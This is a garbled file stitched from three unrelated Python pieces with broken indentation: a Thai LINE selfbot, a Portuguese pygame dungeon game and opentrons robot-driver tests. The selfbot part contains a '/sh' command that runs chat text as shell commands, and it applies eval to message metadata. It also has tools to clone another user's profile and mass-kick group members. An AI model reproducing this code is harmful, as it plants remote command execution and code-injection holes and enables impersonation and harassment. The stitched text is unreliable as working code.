profile.pictureStatus = phusui.downloadFileURL("http://dl.profile.line-cdn.net/{}".format(settings["myProfile"]["pictureStatus"]), saveAs="tmp/backupPicture.bin")
phusui.updateProfilePicture(profile.pictureStatus)
phusui.updateProfile(profile)
else:
phusui.updateProfile(profile)
pict = phusui.downloadFileURL('http://dl.profile.line-cdn.net/' + settings['myProfile']['pictureStatus'], saveAs="tmp/pict.bin")
vids = phusui.downloadFileURL( 'http://dl.profile.line-cdn.net/' + settings['myProfile']['pictureStatus'] + '/vp', saveAs="tmp/video.bin")
changeVideoAndPictureProfile(pict, vids)
coverId = settings['myProfile']['coverId']
phusui.updateProfileCoverById(coverId)
def sendMention(to, mid, firstmessage, lastmessage):
try:
arrData = ""
text = "%s " %(str(firstmessage))
arr = []
mention = "@x "
slen = str(len(text))
elen = str(len(text) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':mid}
arr.append(arrData)
text += mention + str(lastmessage)
phusui.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as EA:
logError(EA)
phusui.sendMessage(to, "[ INFO ] Error :\n" + str(EA))
def RhyN_(to, mid):
try:
aa = '{"S":"0","E":"3","M":'+json.dumps(mid)+'}'
text_ = '@Rh'
phusui.sendMessage(to, text_, contentMetadata={'MENTION':'{"MENTIONEES":['+aa+']}'}, contentType=0)
except Exception as error:
logError(error)
def restartBot():
print ("RESTART BOT BY PHU SUI")
time.sleep(1)
python = sys.executable
os.execl(python, python, *sys.argv)
def sendMessageWithMention(to, phusuiMID):
try:
aa = '{"S":"0","E":"3","M":'+json.dumps(phusuiMID)+'}'
text_ = '@x '
phusui.sendMessage(to, text_, contentMetadata={'MENTION':'{"MENTIONEES":['+aa+']}'}, contentType=0)
except Exception as error:
logError(error)
start_runtime = datetime.now()
def phuhelp():
phuHelp = """✰SELF PYTHON3✰
✫「help」
✫「me」
✫「myid」
✫「myname」
✫「mybio」
✫「mypic」
✫「mycover」
✫「myinfo」
✫「mid」
✫「contact」
✫「info」
✫「tag」 [number]
✫「restart」
✫「runtime」
✫「speed」
✫「unsend」
✫「mention」
✫「invitetocall」
✫「stag」 [number] {@}
✫「addfriend」 {@}
✫「delfriend」 {@}
✫「uid」 {@}
✫「bye」 {@}
✫「copy」 {@}
✫「cgroup」 {@}
✫「info」 {@}
✫「upname」 [text]
✫「blockid」 [mid]
✫「autoblock」 on/off
✫「autoadd」 on/off
✫「autoread」 on/off
✫「setmessageadd」: [text]
✫「welcomepic」 on/off
✫「welcomemessage」 on/off
✫「welcomemessage」: [text]
•─✯͜͡✯By Phusui of Midnight✯͜͡✯─•"""
return phuHelp
respRemember = {}
#==============================================================================#
def phusuiBot(op):
try:
if op.type == 0:
return
if op.type == 5:
if settings['autoBlock'] == True:
phusui.blockContact(op.param1)
if settings['autoadd'] == True:
phusui.findAndAddContactsByMid(op.param1)
if (settings["messageadd"] in [""," ","\n",None]):
pass
else:
phusui.sendMessage(op.param1,str(settings["messageadd"]))
if op.type == 17:
if settings['welcomemessage'] and "welcomemessage" in settings:
cnt = phusui.getContact(op.param2)
phusui.sendMessage(op.param1,cnt.displayName + "\n" + str(settings["welcomemessage"]))
if settings['welcomepic'] and "welcomepic" in settings:
cnt = phusui.getContact(op.param2)
phusui.sendImageWithURL(op.param1,"http://dl.profile.line.naver.jp/" + cnt.pictureStatus)
if settings["alwayread"]:
phusui.sendChatChecked(msg.from_,msg.id)
else:
phusui.sendChatChecked(msg.to,msg.id)
if op.type == 25 or op.type == 26:
msg = op.message
text = msg.text
msg_id = msg.id
receiver = msg.to
sender = msg._from
if msg.toType == 0 or msg.toType == 1 or msg.toType == 2:
if msg.toType == 0:
if sender != phusui.profile.mid:
to = sender
else:
to = receiver
elif msg.toType == 1:
to = receiver
elif msg.toType == 2:
to = receiver
if msg.contentType == 0:
if text is None:
return
#==============================================================================#
elif msg.text.lower() == "/help":
phuHelp = phuhelp()
phusui.sendMessage(to, str(phuHelp))
phusui.sendContact(to, "u5a91f31a0882cae3e309576cc4bf1e5a")
elif text.lower() in ["/me"]:
phusui.sendContact(to, phusuiMID)
elif text.lower() in ["/myid"]:
phusui.sendMessage(to, phusuiMID)
elif text.lower() in ["/myname"]:
me = phusui.getContact(phusuiMID)
phusui.sendMessage(msg.to, me.displayName)
elif text.lower() in ["/mybio"]:
me = phusui.getContact(phusuiMID)
phusui.sendMessage(msg.to,me.statusMessage)
elif text.lower() in ["/mypic"]:
me = phusui.getContact(phusuiMID)
phusui.sendImageWithURL(msg.to,"http://dl.profile.line-cdn.net/" + me.pictureStatus)
elif text.lower() in ["/mycover"]:
me = phusui.getContact(phusuiMID)
cover = phusui.getProfileCoverURL(phusuiMID)
phusui.sendImageWithURL(msg.to, cover)
elif text.lower() in ["/myinfo"]:
phusui.sendContact(to, phusuiMID)
phusui.sendMessage(msg.to, phusuiMID)
me = phusui.getContact(phusuiMID)
phusui.sendMessage(msg.to, me.displayName)
me = phusui.getContact(phusuiMID)
phusui.sendMessage(msg.to,me.statusMessage)
me = phusui.getContact(phusuiMID)
phusui.sendImageWithURL(msg.to,"http://dl.profile.line-cdn.net/" + me.pictureStatus)
me = phusui.getContact(phusuiMID)
cover = phusui.getProfileCoverURL(phusuiMID)
phusui.sendImageWithURL(msg.to, cover)
elif text.lower() in ["/mid"]:
phusui.sendMessage(to,to)
elif text.lower() in ["/contact"]:
                        phusui.sendContact(to, phusuiMID)  # likely intended to send own contact card
elif text.lower() in ["/speed"]:
start = time.time()
phusui.sendMessage(msg.to,"กำลังทดสอบ(`・ω・´)")
phusui.sendMessage(msg.to,str(int(round((time.time() - start) * 1000)))+" ปิง")
elif text.lower() in ["/restart"]:
phusui.sendMessage(to, "กำลังเริ่มใหม่...")
time.sleep(1)
phusui.sendMessage(to, "SELF BOT BYPHUSUI")
phusui.sendMessage(to, "บอทได้ทำการเริ่มใหม่สำเร็จแล้ว")
restartBot()
elif text.lower() in ["/runtime"]:
phusui.sendMessage(msg.to,str(datetime.now() - start_runtime)[:-7].split(":")[0]+" hour, "+str(datetime.now() - start_runtime)[:-7].split(":")[1]+" minute, "+str(datetime.now() - start_runtime)[:-7].split(":")[2]+" second,")
elif text.lower() in ["/invitetocall"]:
exc = phusui.getGroup(msg.to).members
zxc = phusui.getProfile().mid
phusui.inviteIntoGroupCall(msg.to,[uid.mid for uid in exc if uid.mid != zxc])
phusui.sendMessage(msg.to,"เชิญเข้าร่วมการคอลเรียบร้อยแล้วครับ:)")
elif "/upname " in msg.text.lower():
spl = re.split("/upname ",msg.text,flags=re.IGNORECASE)
if spl[0] == "":
prof = phusui.getProfile()
prof.displayName = spl[1]
phusui.updateProfile(prof)
phusui.sendMessage(msg.to,"เปลี่ยนชื่อสำเร็จแล้ว:)")
elif msg.text.lower().startswith("/blockid "):
user = msg.text.lower().replace("/blockid ","")
phusui.blockContact(user)
phusui.sendMessage(to, "ทำการบล็อคไอดีนั้นแล้ว")
elif "/sh " in msg.text.lower():
spl = re.split("/sh ",msg.text,flags=re.IGNORECASE)
if spl[0] == "":
try:
phusui.sendMessage(msg.to,subprocess.getoutput(spl[1]))
except:
pass
elif "/uid " in msg.text.lower():
if msg.toType == 2:
red = re.compile(re.escape('/uid '),re.IGNORECASE)
namel = red.sub('',msg.text)
namel = namel.lstrip()
namel = namel.replace(" @","$spliter$")
namel = namel.replace("@","")
namel = namel.rstrip()
namel = namel.split("$spliter$")
gmem = phusui.getGroup(msg.to).members
for targ in gmem:
if targ.displayName in namel:
phusui.sendMessage(msg.to,targ.displayName+": "+targ.mid)
elif "/bye" in msg.text.lower():
if msg.contentMetadata is not None:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
phusui.kickoutFromGroup(msg.to,[target])
except:
phusui.kickoutFromGroup(msg.to,[target])
else:
pass
elif msg.text.lower().startswith("/cgroup "):
phusui.sendMessage(to, "กำลังตรวจสอบข้อมูล...")
if 'MENTION' in msg.contentMetadata.keys() != None:
names = re.findall(r'@(\w+)', text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
G = phusui.getGroupIdsJoined()
cgroup = phusui.getGroups(G)
ngroup = ""
for mention in mentionees:
for x in range(len(cgroup)):
gMembMids = [contact.mid for contact in cgroup[x].members]
if mention['M'] in gMembMids:
ngroup += "\n➢ " + cgroup[x].name + " | สมาชิก: " +str(len(cgroup[x].members))
if ngroup == "":
phusui.sendMessage(to, "ไม่พบ")
else:
phusui.sendMessage(to, "***ตรวจพบอยู่ในกลุ่ม %s"%(ngroup))
elif msg.text.lower().startswith("/copy "):
if 'MENTION' in msg.contentMetadata.keys()!= None:
names = re.findall(r'@(\w+)', text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
lists = []
for mention in mentionees:
if mention["M"] not in lists:
lists.append(mention["M"])
                            if len(lists) != 0:
ls = random.choice(lists)
cloneProfile(ls)
phusui.sendMentionFooter(to, 'copy\n', sender, "http://line.me/ti/p/~botline2034", "http://dl.profile.line-cdn.net/"+phusui.getContact(sender).pictureStatus, phusui.getContact(sender).displayName);phusui.sendMessage(to, phusui.getContact(sender).displayName, contentMetadata = {'previewUrl': 'http://dl.profile.line-cdn.net/'+phusui.getContact(sender).pictureStatus, 'i-installUrl': 'http://line.me/ti/p/~botline2034', 'type': 'mt', 'subText': " ", 'a-installUrl': 'http://line.me/ti/p/~botline2034', 'a-installUrl': ' http://line.me/ti/p/~botline2034', 'a-packageName': 'com.spotify.music', 'countryCode': 'ID', 'a-linkUri': 'http://line.me/ti/p/~botline2034', 'i-linkUri': 'http://line.me/ti/p/~botline2034', 'id': 'mt000000000a6b79f9', 'text': ' ', 'linkUri': 'http://line.me/ti/p/~botline2034'}, contentType=19)
phusui.sendMessage(to,"คัดลอกบัญชีเรียบร้อยแล้ว", contentMetadata = {'AGENT_ICON': 'http://dl.profile.line-cdn.net/'+phusui.getContact(mid).pictureStatus, 'AGENT_NAME': 'Creator', 'AGENT_LINK': 'https://bit.ly/2JpqZ7H'})
elif text.lower in ["/save"]:
try:
backupProfile()
phusui.sendMessage(to, "บันทึกสถานะบัญชีเรียบร้อยแล้ว", contentMetadata = {'AGENT_ICON': 'http://dl.profile.line-cdn.net/'+phusui.getContact(mid).pictureStatus, 'AGENT_NAME': 'Creator', 'AGENT_LINK': 'https://bit.ly/2JpqZ7H'})
except Exception as e:
phusui.sendMessage(to, "ไม่สามารถบันทึกสถานะบัญชีได้", contentMetadata = {'AGENT_ICON': 'http://dl.profile.line-cdn.net/'+phusui.getContact(mid).pictureStatus, 'AGENT_NAME': 'Creator', 'AGENT_LINK': 'https://bit.ly/2JpqZ7H'})
phusui.sendMessage(msg.to, str(e))
elif text.lower in ["/load"]:
try:
restoreProfile()
phusui.sendMentionFooter(to, 'ãloadã\n', sender, "http://line.me/ti/p/~botline2034", "http://dl.profile.line-cdn.net/"+phusui.getContact(sender).pictureStatus, phusui.getContact(sender).displayName);phusui.sendMessage(to, phusui.getContact(sender).displayName, contentMetadata = {'previewUrl': 'http://dl.profile.line-cdn.net/'+phusui.getContact(sender).pictureStatus, 'i-installUrl': 'http://line.me/ti/p/~botline2034', 'type': 'mt', 'subText': " ", 'a-installUrl': 'http://line.me/ti/p/~botline2034', 'a-installUrl': ' http://line.me/ti/p/~botline2034', 'a-packageName': 'com.spotify.music', 'countryCode': 'ID', 'a-linkUri': 'http://line.me/ti/p/~botline2034', 'i-linkUri': 'http://line.me/ti/p/~botline2034', 'id': 'mt000000000a6b79f9', 'text': ' ', 'linkUri': 'http://line.me/ti/p/~botline2034'}, contentType=19)
phusui.sendMessage(to, "เรียกคืนสถานะบัญชีสำเร็จโปรดรอสักครู่จนกว่าโปรไฟล์จะเปลี่ยน", contentMetadata = {'AGENT_ICON': 'http://dl.profile.line-cdn.net/'+phusui.getContact(mid).pictureStatus, 'AGENT_NAME': 'Creator', 'AGENT_LINK': 'https://bit.ly/2JpqZ7H'})
except Exception as e:
phusui.sendMessage(to, "ไม่สามารถเรียกคืนสถานะบัญชีได้", contentMetadata = {'AGENT_ICON': 'http://dl.profile.line-cdn.net/'+phusui.getContact(mid).pictureStatus, 'AGENT_NAME': 'Creator', 'AGENT_LINK': 'https://bit.ly/2JpqZ7H'})
phusui.sendMessage(msg.to, str(e))
elif msg.text.lower().startswith("/addfriend "):
if 'MENTION' in msg.contentMetadata.keys()!= None:
names = re.findall(r'@(\w+)', text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
lists = []
for mention in mentionees:
if mention["M"] not in lists:
lists.append(mention["M"])
for ls in lists:
phusui.findAndAddContactsByMid(ls)
phusui.sendMessage(to, "เพิ่มเพื่อนแล้ว!")
elif msg.text.lower().startswith("/delfriend "):
if 'MENTION' in msg.contentMetadata.keys()!= None:
names = re.findall(r'@(\w+)', text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
lists = []
for mention in mentionees:
if mention["M"] not in lists:
lists.append(mention["M"])
for ls in lists:
phusui.deleteContact(ls)
phusui.sendMessage(to, "ลบออกจากการเป็นเพื่อนแล้ว!")
elif msg.text.lower().startswith("/info "):
if phusui != None:
if 'MENTION' in msg.contentMetadata.keys()!= None:
names = re.findall(r'@(\w+)', text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
lists = []
for mention in mentionees:
if mention["M"] not in lists:
lists.append(mention["M"])
for ls in lists:
me = phusui.getContact(ls)
path = phusui.getProfileCoverURL(ls)
path = str(path)
if settings["server"] == "VPS":
phusui.sendMessage(msg.to,"「 Display Name 」\n" + me.displayName)
phusui.sendMessage(msg.to,"「 Status Message 」\n" + me.statusMessage)
phusui.sendMessage(msg.to,"「 MID 」\n" + to)
phusui.sendMessage(to, text=None, contentMetadata={'mid': ls}, contentType=13)
phusui.sendImageWithURL(msg.to,"http://dl.profile.line-cdn.net/" + me.pictureStatus)
                                        phusui.sendImageWithURL(to,
import pygame
import mapaController
import cheater
import spriteLoader as tiles
import random
import time
import os
import sys
class Player:
def __init__(self):
self.xp = 0
self.nivel = 1
self.sprite_atual = tiles.playerDict[pygame.K_s]
        # 24, 35 (end at the top)
        # 25, 34 (end on the left)
self.pos = (1, 1)
self.maxHP = 100
self.status = Stats(self.maxHP, 10, 10, 10, 10, 10)
self.potions = 0
self.weapon = Stats(0, 0, 0, 0, 0, 0)
self.armor = Stats(0, 0, 0, 0, 0, 0)
def adicionaXP(self, quantidade):
if(quantidade >= 100):
self.xp += 101
else:
self.xp += quantidade
if(self.xp % 100 >= 1):
while (self.xp > 100):
if(self.xp % 100 >= 1):
self.nivel += 1
self.xp -= 100
self.maxHP += 50
self.status.vida = self.maxHP
self.status.acuracia += random.randint(0, 10) + self.nivel
self.status.critico += random.randint(0, 10) + self.nivel
self.status.defesa += random.randint(0, 10) + self.nivel
self.status.destreza += random.randint(0, 10) + self.nivel
self.status.forca += random.randint(0, 10) + self.nivel
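    # Illustrative behaviour of adicionaXP (not executed): starting from xp=0, nivel=1,
    #   adicionaXP(130) -> gain capped at 101 xp, so the player reaches nivel 2 and xp drops back to 1
    #   adicionaXP(40)  -> xp becomes 41 with no level-up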
def mostraStats(self):
textXP = basicfont.render(
'XP: ' + str(self.xp), True, (0, 0, 0), (255, 255, 255))
txtLVL = basicfont.render(
'Nível: ' + str(self.nivel), True, (0, 0, 0), (255, 255, 255))
txtArmorHP = " + " + str(self.armor.vida)
txtWeaponHP = " + " + str(self.weapon.vida)
totalHP = " = " + str(self.status.vida +
self.armor.vida + self.weapon.vida)
txtHP = basicfont.render(
'Vida: ' + str(self.status.vida) + txtArmorHP + txtWeaponHP + totalHP, True, (0, 0, 0), (255, 255, 255))
txtArmorF = " + " + str(self.armor.forca)
txtWeaponF = " + " + str(self.weapon.forca)
totalF = " = " + str(self.status.forca +
self.armor.forca + self.weapon.forca)
txtForca = basicfont.render(
'Força: ' + str(self.status.forca) + txtArmorF + txtWeaponF + totalF, True, (0, 0, 0), (255, 255, 255))
txtArmorD = " + " + str(self.armor.defesa)
txtWeaponD = " + " + str(self.weapon.defesa)
totalD = " = " + str(self.status.defesa +
self.armor.defesa + self.weapon.defesa)
txtDefesa = basicfont.render(
'Defesa: ' + str(self.status.defesa) + txtArmorD + txtWeaponD + totalD, True, (0, 0, 0), (255, 255, 255))
txtArmorA = " + " + str(self.armor.acuracia)
txtWeaponA = " + " + str(self.weapon.acuracia)
totalA = " = " + str(self.status.acuracia +
self.armor.acuracia + self.weapon.acuracia)
txtAcura = basicfont.render(
'Acurácia: ' + str(self.status.acuracia) + txtArmorA + txtWeaponA + totalA, True, (0, 0, 0), (255, 255, 255))
txtArmorH = " + " + str(self.armor.destreza)
txtWeaponH = " + " + str(self.weapon.destreza)
totalH = " = " + str(self.status.destreza +
self.armor.destreza + self.weapon.destreza)
txtDex = basicfont.render(
'Destreza: ' + str(self.status.destreza) + txtArmorH + txtWeaponH + totalH, True, (0, 0, 0), (255, 255, 255))
txtArmorC = " + " + str(self.armor.critico)
txtWeaponC = " + " + str(self.weapon.critico)
totalC = " = " + str(self.status.critico +
self.armor.critico + self.weapon.critico)
txtCrit = basicfont.render(
'Crítico: ' + str(self.status.critico) + txtArmorC + txtWeaponC + totalC, True, (0, 0, 0), (255, 255, 255))
textP = basicfont.render(
'Poções: ' + str(self.potions), True, (0, 0, 0), (255, 255, 255))
# forca, critico, destreza, acuracia, defesa
textStatus = basicfont.render(
'Status + Armadura + Arma', True, (0, 0, 0), (255, 255, 255))
screen.blit(txtLVL, (5, 5))
screen.blit(textXP, (100, 5))
screen.blit(txtHP, (200, 5))
screen.blit(textStatus, (650, 450))
screen.blit(txtForca, (650, 475))
screen.blit(txtCrit, (650, 500))
screen.blit(txtDex, (650, 525))
screen.blit(txtDefesa, (650, 550))
screen.blit(txtAcura, (650, 575))
screen.blit(textP, (650, 600))
def andar(self, direcao, mapa):
x = self.pos[0]
y = self.pos[1]
pos = (x, y)
if direcao == pygame.K_w:
pos = (x - 1, y)
self.sprite_atual = tiles.playerDict[direcao]
if direcao == pygame.K_a:
pos = (x, y - 1)
self.sprite_atual = tiles.playerDict[direcao]
if direcao == pygame.K_s:
pos = (x + 1, y)
self.sprite_atual = tiles.playerDict[direcao]
if direcao == pygame.K_d:
pos = (x, y + 1)
self.sprite_atual = tiles.playerDict[direcao]
if(mapa[pos[0]][pos[1]] != "1"):
self.pos = pos
def desenhaPlayer(self):
screen.blit(self.sprite_atual,
(640+self.pos[1]*16, self.pos[0]*16))
class Bau:
def __init__(self, i, j):
self.pos = (i, j)
self.potions = 0
self.arma = None
self.armadura = None
def printaBau(self, mapa, player):
teclaApertada = None
while True:
for event in pygame.event.get():
if event.type == pygame.QUIT:
exit()
elif event.type == pygame.KEYDOWN:
teclaApertada = event.key
player.mostraStats()
text1 = basicfont.render(
'Baú achado!', True, (0, 0, 0), (255, 255, 255))
string = None
if(self.arma):
txtVidaArma = (self.arma.vida - player.weapon.vida)
txtForcaArma = (self.arma.forca - player.weapon.forca)
txtCriticoArma = (self.arma.critico - player.weapon.critico)
txtDestrezaArma = (self.arma.destreza - player.weapon.destreza)
txtAcuraciaArma = (self.arma.acuracia - player.weapon.acuracia)
txtDefesaArma = (self.arma.defesa - player.weapon.defesa)
txtVidaArma = "+" + \
str(txtVidaArma) if txtVidaArma >= 0 else txtVidaArma
txtForcaArma = "+" + \
str(txtForcaArma) if txtForcaArma >= 0 else txtForcaArma
txtCriticoArma = "+" + \
str(txtCriticoArma) if txtCriticoArma >= 0 else txtCriticoArma
txtDestrezaArma = "+" + \
str(txtDestrezaArma) if txtDestrezaArma >= 0 else txtDestrezaArma
txtAcuraciaArma = "+" + \
str(txtAcuraciaArma) if txtAcuraciaArma >= 0 else txtAcuraciaArma
txtDefesaArma = "+" + \
str(txtDefesaArma) if txtDefesaArma >= 0 else txtDefesaArma
string = "Arma: {} {} {} {} {} {}".format(
txtVidaArma, txtForcaArma, txtCriticoArma, txtDestrezaArma, txtAcuraciaArma, txtDefesaArma)
else:
txtVidaArmadura = (self.armadura.vida - player.armor.vida)
txtForcaArmadura = (self.armadura.forca - player.armor.forca)
txtCriticoArmadura = (
self.armadura.critico - player.armor.critico)
txtDestrezaArmadura = (
self.armadura.destreza - player.armor.destreza)
txtAcuraciaArmadura = (
self.armadura.acuracia - player.armor.acuracia)
txtDefesaArmadura = (
self.armadura.defesa - player.armor.defesa)
txtVidaArmadura = "+" + \
str(txtVidaArmadura) if txtVidaArmadura >= 0 else txtVidaArmadura
txtForcaArmadura = "+" + \
str(txtForcaArmadura) if txtForcaArmadura >= 0 else txtForcaArmadura
txtCriticoArmadura = "+" + \
str(txtCriticoArmadura) if txtCriticoArmadura >= 0 else txtCriticoArmadura
txtDestrezaArmadura = "+" + \
str(txtDestrezaArmadura) if txtDestrezaArmadura >= 0 else txtDestrezaArmadura
txtAcuraciaArmadura = "+" + \
str(txtAcuraciaArmadura) if txtAcuraciaArmadura >= 0 else txtAcuraciaArmadura
txtDefesaArmadura = "+" + \
str(txtDefesaArmadura) if txtDefesaArmadura >= 0 else txtDefesaArmadura
string = "Armadura: {} {} {} {} {} {}".format(
txtVidaArmadura, txtForcaArmadura, txtCriticoArmadura, txtDestrezaArmadura, txtAcuraciaArmadura, txtDefesaArmadura)
text2 = basicfont.render(
'C - Pegar itens', True, (0, 0, 0), (255, 255, 255))
text3 = basicfont.render(
'X - Deixar para depois...', True, (0, 0, 0), (255, 255, 255))
conteudo = basicfont.render(
string, True, (0, 0, 0), (255, 255, 255))
pocoes = basicfont.render(
"E " + str(self.potions) + " poções", True, (0, 0, 0), (255, 255, 255))
screen.blit(text1, (200, 475))
screen.blit(conteudo, (200, 500))
screen.blit(pocoes, (200, 525))
screen.blit(text2, (200, 550))
screen.blit(text3, (200, 575))
pygame.display.update()
if(teclaApertada == pygame.K_c):
mapa.matriz[self.pos[0]][self.pos[1]] = "0"
if(self.arma):
player.weapon = self.arma
else:
player.armor = self.armadura
player.potions += self.potions
return
if(teclaApertada == pygame.K_x):
return False
class Mapa:
def __init__(self, mapa):
self.matriz = mapa
self.fog = mapaController.carregaMap("mapa.txt")
self.level = 1
self.baus = []
def iniciaFog(self):
fog = self.fog
for i in range(0, len(fog)):
for j in range(0, len(fog[i])):
fog[i][j] = 0
self.fog = fog
def controlaFog(self, player):
esquerda = player.pos[1] - 3 if player.pos[1] - 3 > 0 else 0
cima = player.pos[0] - 3 if player.pos[0] - 3 > 0 else 0
baixo = player.pos[0] + 4 if player.pos[0] + 4 < 27 else 27
direita = player.pos[1] + 4 if player.pos[1] + 4 < 37 else 37
for i in range(esquerda, direita):
for j in range(cima, baixo):
self.fog[j][i] = 1
return
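    # Illustrative effect (not executed): for a player at (10, 10) this reveals the
    # 7x7 window fog[7..13][7..13]; near the borders the window is clamped to the
    # 27x37 map bounds used above.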
def printFog(self):
for i in range(0, len(self.fog)):
for j in range(0, len(self.fog[i])):
if(self.fog[i][j] == 0):
screen.blit(
tiles.mapDict["F"], (640+j*16, i*16))
def printMap(self):
for i in range(0, len(self.matriz)):
for j in range(0, len(self.matriz[i])):
screen.blit(
tiles.mapDict["0"], (640+j*16, i*16))
screen.blit(
tiles.mapDict[self.matriz[i][j]], (640+j*16, i*16))
text1 = basicfont.render(
'Profundidade: ' + str(self.level), True, (0, 0, 0), (255, 255, 255))
screen.blit(text1, (975, 450))
def printMapCheater(self, matriz):
for i in range(0, len(matriz)):
for j in range(0, len(matriz[i])):
if(matriz[i][j] == -1):
screen.blit(
tiles.mapDict["1"], (640+j*16, i*16))
if(matriz[i][j] != -1):
screen.blit(
tiles.mapDict[self.matriz[i][j]], (640+j*16, i*16))
    def contaBaus(self):
        qtdeBaus = 0
        for linha in self.matriz:
            for celula in linha:
                if celula == "B":
                    qtdeBaus += 1
        return qtdeBaus
def geraItens(self, nivel, mapa):
for i in range(0, len(self.matriz)):
for j in range(0, len(self.matriz[i])):
if(self.matriz[i][j] == "B"):
bau = Bau(i, j)
bau.potions = random.randint(1, 3*nivel)
self.vida = random.randint(5, 10*nivel)
self.forca = random.randint(5, 10*nivel)
self.critico = random.randint(5, 10*nivel)
self.destreza = random.randint(5, 10*nivel)
self.acuracia = random.randint(5, 10*nivel)
self.defesa = random.randint(5, 10*nivel)
self.status = Stats(self.vida, self.forca, self.critico,
self.destreza, self.acuracia, self.defesa)
if(random.randint(1, 2) == 2):
bau.arma = self.status
else:
bau.armadura = self.status
mapa.baus.append(bau)
        # when the player reaches a chest, this item-generation function is run
        # it stores that chest's position and, on execution, checks whether it already exists
        # if it does not exist, it generates more
from copy import deepcopy
from unittest.mock import Mock
import pytest
from opentrons.drivers.types import MoveSplit
from tests.opentrons.conftest import fuzzy_assert
from opentrons.config.robot_configs import (
DEFAULT_GANTRY_STEPS_PER_MM, DEFAULT_PIPETTE_CONFIGS)
from opentrons.drivers import serial_communication, utils
from opentrons.drivers.smoothie_drivers import driver_3_0
def position(x, y, z, a, b, c):
return {axis: value for axis, value in zip('XYZABC', [x, y, z, a, b, c])}
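# The helper above maps the six axis letters to their values, e.g.:
#   position(1, 2, 3, 4, 5, 6) == {'X': 1, 'Y': 2, 'Z': 3, 'A': 4, 'B': 5, 'C': 6}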
def test_update_position(smoothie, monkeypatch):
driver = smoothie
def _new_send_message(self, command, timeout=None):
return 'ok MCS: X:0.0000 Y:0.0000 Z:0.0000 A:0.0000 B:0.0000 C:0.0000'
monkeypatch.setattr(driver, '_send_command', _new_send_message)
driver.update_position()
expected = {
'X': 0,
'Y': 0,
'Z': 0,
'A': 0,
'B': 0,
'C': 0
}
assert driver.position == expected
count = 0
def _new_send_message2(self, command, timeout=None):
nonlocal count
# first attempt to read, we get bad data
msg = 'ok MCS: X:0.0000 Y:MISTAKE Z:0.0000 A:0.0000 B:0.0000 C:0.0000'
if count > 0:
# any following attempts to read, we get good data
msg = msg.replace('Y:MISTAKE', 'Y:0.0000')
count += 1
return msg
monkeypatch.setattr(driver, '_send_command', _new_send_message2)
driver.update_position()
expected = {
'X': 0,
'Y': 0,
'Z': 0,
'A': 0,
'B': 0,
'C': 0
}
assert driver.position == expected
@pytest.mark.parametrize(
argnames=["cmd", "resp", "expected"],
argvalues=[
# Remove command from response
["G28.2B", "G28.2B", ""],
["G28.2B G1", "G28.2B G1", ""],
["G28.2B G1", "G1G28.2BG1", ""],
# Remove command and whitespace from response
["\r\nG52\r\n\r\n", "\r\nG52\r\n\r\n", ""],
["\r\nG52\r\n\r\nsome-data\r\nok\r\n",
"\r\nG52\r\n\r\nsome-data\r\nok\r\nTESTS-RULE",
"TESTS-RULE"
],
["\r\nG52\r\n\r\nsome-data\r\nok\r\n",
"G52\r\n\r\nsome-data\r\nokT\r\nESTS-RULE",
"TESTS-RULE"],
# L is not a command echo but a token
["M371 L \r\n\r\n",
"L:703130",
"L:703130"],
# R is not a command echo but a token
["M3 R \r\n\r\n",
"M3R:703130",
"R:703130"],
["M369 L \r\n\r\n",
"M369 L \r\n\r\nL:5032304D56323032303230303432323036000000000000000000000000000000", # noqa: E501
"L:5032304D56323032303230303432323036000000000000000000000000000000"]
]
)
def test_remove_serial_echo(
smoothie: driver_3_0.SmoothieDriver_3_0_0,
cmd: str, resp: str, expected: str):
"""It should remove unwanted characters only."""
res = smoothie._remove_unwanted_characters(
cmd, resp)
assert res == expected
def test_parse_position_response(smoothie):
good_data = 'ok M114.2 X:10 Y:20 Z:30 A:40 B:50 C:60'
bad_data = 'ok M114.2 X:10 Y:20: Z:30A:40 B:50 C:60'
res = driver_3_0._parse_position_response(good_data)
expected = {
'X': 10,
'Y': 20,
'Z': 30,
'A': 40,
'B': 50,
'C': 60,
}
assert res == expected
with pytest.raises(driver_3_0.ParseError):
driver_3_0._parse_position_response(bad_data)
def test_dwell_and_activate_axes(smoothie, monkeypatch):
command_log = []
smoothie._setup()
smoothie.simulating = False
def write_with_log(command, ack, connection, timeout, tag=None):
command_log.append(command.strip())
return driver_3_0.SMOOTHIE_ACK
def _parse_position_response(arg):
return smoothie.position
monkeypatch.setattr(serial_communication, 'write_and_return',
write_with_log)
monkeypatch.setattr(
driver_3_0, '_parse_position_response', _parse_position_response)
smoothie.activate_axes('X')
smoothie._set_saved_current()
smoothie.dwell_axes('X')
smoothie._set_saved_current()
smoothie.activate_axes('XYBC')
smoothie._set_saved_current()
smoothie.dwell_axes('XC')
smoothie._set_saved_current()
smoothie.dwell_axes('BCY')
smoothie._set_saved_current()
expected = [
['M907 A0.1 B0.05 C0.05 X1.25 Y0.3 Z0.1 G4 P0.005'],
['M400'],
['M907 A0.1 B0.05 C0.05 X0.3 Y0.3 Z0.1 G4 P0.005'],
['M400'],
['M907 A0.1 B0.05 C0.05 X1.25 Y1.25 Z0.1 G4 P0.005'],
['M400'],
['M907 A0.1 B0.05 C0.05 X0.3 Y1.25 Z0.1 G4 P0.005'],
['M400'],
['M907 A0.1 B0.05 C0.05 X0.3 Y0.3 Z0.1 G4 P0.005'],
['M400'],
]
fuzzy_assert(result=command_log, expected=expected)
def test_disable_motor(smoothie, monkeypatch):
command_log = []
smoothie.simulating = False
def write_with_log(command, ack, connection, timeout, tag=None):
command_log.append(command.strip())
return driver_3_0.SMOOTHIE_ACK
def _parse_position_response(arg):
return smoothie.position
monkeypatch.setattr(serial_communication, 'write_and_return',
write_with_log)
monkeypatch.setattr(
driver_3_0, '_parse_position_response', _parse_position_response)
smoothie.disengage_axis('X')
smoothie.disengage_axis('XYZ')
smoothie.disengage_axis('ABCD')
expected = [
['M18 X'],
['M400'],
